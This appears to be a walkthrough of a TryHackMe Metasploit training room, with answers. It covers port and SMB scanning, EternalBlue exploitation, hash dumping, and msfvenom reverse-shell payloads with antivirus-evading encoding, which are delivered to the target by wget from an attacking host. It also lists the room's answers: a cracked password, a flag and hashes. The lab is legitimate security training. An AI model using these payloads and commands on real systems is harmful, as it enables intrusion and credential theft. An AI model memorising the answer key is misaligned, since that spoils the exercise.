Task 1 | Introduction
In this room we will cover:
- How to scan target systems using Metasploit.
- How to use the Metasploit database feature.
- How to use Metasploit to conduct a vulnerability scan.
- How to use Metasploit to exploit vulnerable services on target systems.
- How msfvenom can be used to create payloads and obtain a Meterpreter session on the target system.
For these tasks will be using a wordlist.
If you’re using the attackbox this can be found at the path: /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
OR
Download the wordlist by clicking the Download Task Files button on the top right if you’re using your own machine.
Questions:
Start the AttackBox and run Metasploit using the msfconsole command to follow along this room.
No answer needed
Task 2 | Scanning
Port Scanning
Metasploit has a few modules to scan open ports. List these scanning modules using the search portscan command.
After picking a module, we need to see what is required to run this scan, use show options once you selected said module.
Example:
- Concurrency: Number of targets to be scanned simultaneously.
- Ports: Port range to be scanned. Notes, nmap will scan the 1000 most used ports by default, while Metasploit will scan port numbers from 1 to 10,000.
- Rhosts: Target or target network to be scanned.
- Threads: Number of threads that will be used simultaneously. More threads will result in a faster scan.
Nmap can also be used from the msfconsole prompt for a faster scan.
UDP service identification
The scanner/discovery/udp_sweep provides a quick way to identify services running over UDP. It won’t give you full details but it’s a good way to identify services such as DNS or NetBIOS.
SMB Scans
Metasploit has several auxiliary modules to scan specific services, SMB being one of them. The smb_enumshares and smb_version scans are useful for corporate networks.
When performing service scans, make sure to include services like NetBIOS that allows for sharing and sending files over the network (like SMB). NetBIOS can give you details that are important (e.g. CORP-DC, DEVOPS, SALES, etc.). Running into shares files and folders that can be accessed without a password or even with a simple password.
Questions:
How many ports are open on the target?
Answer: 5
Explanation:
Performing a portscan with auxiliary scanner/portscan/tcp: This is good way to see open ports!
We can use nmap to scan to give us a little more detail of the services running on these ports:
Using the relevant scanner, what NetBIOS name can you see?
Answer: ACME IT SUPPORT
Explanation:
Metasploit has a scanning tool that gives us information about the NetBIOS service running, using scanner/discovery/udp_sweep.
Once we select the scanner, use show options to see what parameters need to be set before we run it. It looks like RHOSTS needs to be set. The command to do this is set rhosts [target IP]. Run the scan and you’ll see the name for NetBIOS.
What is running on port 8000?
Answer: webs/1.21
Explanation:
From our nmap scan we can see that the HTTP-alt service is running on port 8000. Seeing how it’s HTTP we’ll use an HTTP scanner. We will use “use auxiliary scanner/http/http_version”
Now we need to know what parameters need to be set with show options
Set the RHOSTS with the target IP.
Make sure to change the RPORT! We have to scan the port 8000, the default is set at 80.
After setting parameters, we can now run the scanner.
What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.
Answer: leo1234
Explanation:
We need to bruteforce the password. The scanner we need to use is auxiliary /scanner/smb/smb_login.
Plug in the information we have for the parameters (show options):
- RHOSTS: target IP
- SMBUser: penny
- PASS_FILE: /path/to/file/MetasploitWordlist-1632491116676.txt
Once parameters are set, run the scanner! When the scan is complete you should see the credentials for the username like so:
Task 3 | The Metasploit Database
Metasploit has a database that simplifies project management. A real penetration test there will have several targets being tested so avoiding confusion is important.
- You will need to start the PostgreSQL database with the Metasploit command: systemctl start postgresql
- Then you need to initialize the Metasploit Database using the msfdb init command
- Now launch msfconsole and check the database status using db_status
Workspaces:
- The database allows you to create workspaces to isolate different projects. When first launched, you should be in the default workspace. Listing workspaces with workspace command.
- You can add a workspace using -a or delete a workspace with -d
Here we can see a workspace named “tryhackme” was created:
- The new workspace starts with a * symbol. To switch between workspaces type workspace [workspace name]:
- Workspace options can be viewed with workspace -h command.
—
Once Metasploit is launched with a database, the help command will show you the Database Backends.
If you run a Nmap scan using db_nmap, all results will be saved to the database. Command: db_nmap -sV -p- [target IP]
You can now reach information relevant to hosts and services running on target systems with hosts and services commands:
Use hosts -h and services -h for available options.
Example Workflow:
- We will use the vulnerability scanning module that finds potential MS17–010 vulnerabilities with the use auxiliary/scanner/smb/smb_ms17_010 command.
- We set the RHOSTS value using hosts -R:
3. We have typed show options to check is all values were assigned correctly. (In this example, 10.10.12.229 is the IP address we have scanned earlier using the db_nmap command):
4. Once all parameters are set, we launch the exploit using the run or exploit command.
All IP addresses will be used when hosts -R is ran.
In a penetration testing engagement, we could have the following scenario:
- Finding available hosts using the db_nmap command
- Scanning these for further vulnerabilities or open ports (using a port scanning module)
The services command used with the -s parameter will allow you to search for specific services in an environment:
Always look for low hanging fruit vulnerabilities:
- HTTP: Hosts a web application. Can find vulns like SQL injections or remote code execution
- FTP: Anonymous login and provide access to files
- SMB: Could be vulnerable to SMB exploits like MS17–010
- SSH: Could have default or easy to guess credentials
- RDP: Could be vulnerable to Bluekeep or allow desktop access if theres weak credentials used
Metasploit has a lot of different ways to make engagements organized and to analyze data easily.
Task 4 | Vulnerability Scanning
Metasploit allows you to find critical vulnerabilities known as “low hanging fruit”. These vulnerabilities are easy to find and exploit that could allow you to gain a foothold on a system which can lead to root or admin privileges.
The better you are at gathering information on the target, the more vulnerabilities you’ll find using Metasploit. Without thoroughly scanning your target, Metasploit can’t help you much. For example, if you identify a VNC service running on the target, you can use the search function to list useful modules. You can use the info command (when you’re in a module) to get a better understanding of its use and purpose.
The auxiliary scanner/vnc/vnc_login module can help us find login details for the VNC service.
Questions:
Who wrote the module that allows us to check SMTP servers for open relay?
Answer: Campbell Murray
Explanation:
First I search for SMTP relay module. I did this by using search smtp relay
Then I typed use 0 to open the smtp_relay module.
Using info will give us the answer:
Task 5 | Exploitation
As we know, Metasploit can be used to exploit vulnerabilities. You can search exploits with the search command and obtain information about the exploit with the info command. Once we pick what we want, we can then exploit using exploit.
Most exploits will have a default payload. To see a list of other payloads you can list it out with show payloads:
Once you have decided on a payload, you can use the set payload command to make your choice:
Payloads are trial and error, could be caused from firewall rules, antivirus, etc.
Remember to set parameters!
Once a session is opened, you can background it using CTRL+Z or abort it using CTRL+C. Backgrounding a session allows you to work on other things as it’s running.
Working with sessions
The sessions command will list all active sessions. To see options use the sessions -h command.
You can interact with existing sessions with the sessions -i commands followed by the session ID (e.g. sessions -i 1)
Questions:
Exploit one of the critical vulnerabilities on the target VM.
No answer needed
Explanation:
Get Metasploit running with the msfconsole command, then start with an nmap scan to see what services are running on the network:
Windows 7 caught my eye, it’s an outdated windows version.
They hinted at what exploit to use in the above reading (exploit windows/smb/ms17_010_eternalblue).
This exploit takes advantage of SMBv1 vulnerabilities in older versions of Microsoft. SMB is used to share resources and files remotely. If successful this vulnerability can result in remote code execution on the target machine.
I searched for eternalblue in the msfconsole:
Then typed use 0 to select that module
Always check for required parameters with show options:
RHOSTS need to be set to the target IP address.
The LHOST may need to be set to your local machine’s IP address.
When the parameters are set, go ahead and run the exploit with the run command.
A Meterpreter prompt should pop up if the exploit was successful.
Keep in mind you may made need to run this exploit a few times before it works!
What is the content of the flag.txt file?
Answer: THM-5455554845
Explanation:
Meterpreter has a search function to be able to search for a specific string. It’ll look like this: search -f flag.txt
Just like Linux, you can use the cat command to display the contents of a file: cat /users/jon/documents/flag.txt
What is the NTLM hash of the password of the user “pirate”?
Answer:8ce9a3ebd1647fcc5e04025019f4b875
Explanation:
Tryhackme gives us a hint to use hashdump.
Run hashdump in the Meterpreter session:
The first set of numbers (between the two “:”) is the hash of the username, the second set is the hash for the password!
Task 6 | Msfvenom
Msfvenom allows you to generate payloads and access all payloads available in the Metasploit framework. In msfvenom, you can create payloads in different formats (PHP, exe, dll, elf, etc) and for different target systems like Apple, windows, android, Linux, etc.!
Command to view payloads: msfvenom -l payloads
Output formats
You can generate stand-alone payloads (e.g. a Windows executable for Meterpreter) or get a usable raw format (e.g. python). Listing supported output formats with: msfvenom — lists formats
Encoders
Encoders can be effective against antivirus on the target system by encoding the payload. Using modern obfuscation techniques or injecting shell code are a better way to evade antivirus solutions.
Example: Encoding the PHP version of Meterpreter with Base64
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
Breaking it down:
-p | the payload
LHOST | attacking machine
-f | format
-e | encoding
Handlers
Handlers accept incoming connections generated by the MSFvenom payload, which means catching a shell. When using an exploit module, this part is automatically handled by the exploit module. Reverse shells or Meterpreter callbacks generated in your MSFvenom payload can be caught using a handler.
Other Payloads
MSFvenom can be used to create payloads in almost all formats, depending on the target system’s configuration.
In these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen.
Linux Executable and Linkable format (elf):
msfvenom -p Linux/x86/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=xxxx -f elf > rev_shell.elf
The .elf format is the executable files for Linux like the .exe format is Windows. You may need to make sure they have executable permissions on the target machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to accord executable permissions. Once done, run the file by typing ./shell.elf on the target machine command line.
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=XXXX -f exe > rev_shell.exe
PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=XXXX -f raw > rev_shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=XXXX -f asp > rev_shell.asp
Python:
msfvenom -p cmd/meterpreter/reverse_python LHOST=10.10.x.x LPORT=XXXX -f raw > rev_shell.py
All of the examples above are reverse payloads. You will need to have the exploit/multi/handler module listening on your attacking machine to work as the handler. Set up the handler with the payload, LHOST and LPORT parameters. These values will be the same you have used when creating the msfvenom payload.
Questions:
Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type “sudo su” to get a root shell, this will make things easier.
No answer needed
Explanation:
I connected via SSH on my kali machine!
The command to do this is ssh username@targetIP
It’ll give a prompt asking if you want to connect, type yes then hit enter. You will then have to enter the password “1q2w3e4r” Nothing will show up as you’re typing.
Boom, you successfully connected.
Type “sudo su” to get a root shell.
Let’s continue!
Creat a meterpreter payload in the .elf format (on the attackbox, or your attacking machine of choice).
No answer needed
Explanation:
Creating a meterpreter is done in your attacking machines terminal.
They give us the payload we’re supposed to use in the reading. The payload: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=7777 -f elf > rev_shell.elf
Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget://attacking_machine_IP:9000/shell.elf to download it to the target machine).
No answer needed
Explanation:
First, create a python web server on your attacking machine with python3 -m http.server 9000
Then, download the payload to your target machine using the command wget://attacking_machine_IP:9000/rev_shell.elf
Once it’s transferred to the target system, we need to make this payload executable with the chmod +x rev_shell.elf command.
Get a Meterpreter session on the target machine.
No answer needed
Explanation:
Open up a new terminal on your attacking machine and start Metasploit with msfconsole.
You will need to have the exploit/multi/handler module listening on your attacking machine to work as the handler (to catch the shell).
To see required parameters, we’ll use “show options”. We’ll need to set the payload, LHOST and LPORT.
Setting parameters:
Remember the payload we created in msfvenom? Make sure to set that parameter or the handler won’t connect! Like so:
After you get the handler set on your local machine, hit run and then head over to the targets terminal.
Run the file with: ./rev_shell.elf
A meterpreter session should be created if the shell was successful! (In the terminal that you ran the msfconsole on, nothing should happen on the targets terminal, it should just hang)
Use a post exploitation module to dump hashes of other users on the system.
No answer needed
Explanation:
Hashdump dumps all the user hashes. Use the post/linux/gather/hashdump module.
What is the other user’s password hash?
Answer: $6$SyONNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXDWtcQd8rfOtjc77hBFbWx jGmQCTbep0
Task 7 | Summary
Metasploit can help you identify and exploit vulnerabilities on target systems.
You have also seen how the database feature can help when you have multiple targets in a penetration test. Finally, you have gained experience creating standalone Meterpreter payloads with msfvenom. This is helpful in situations where you can upload a file to the target system or have the ability to download files to the target system. Meterpreter is a powerful tool that offers easy to use features during the post exploitation phase.
Questions:
No answer needed
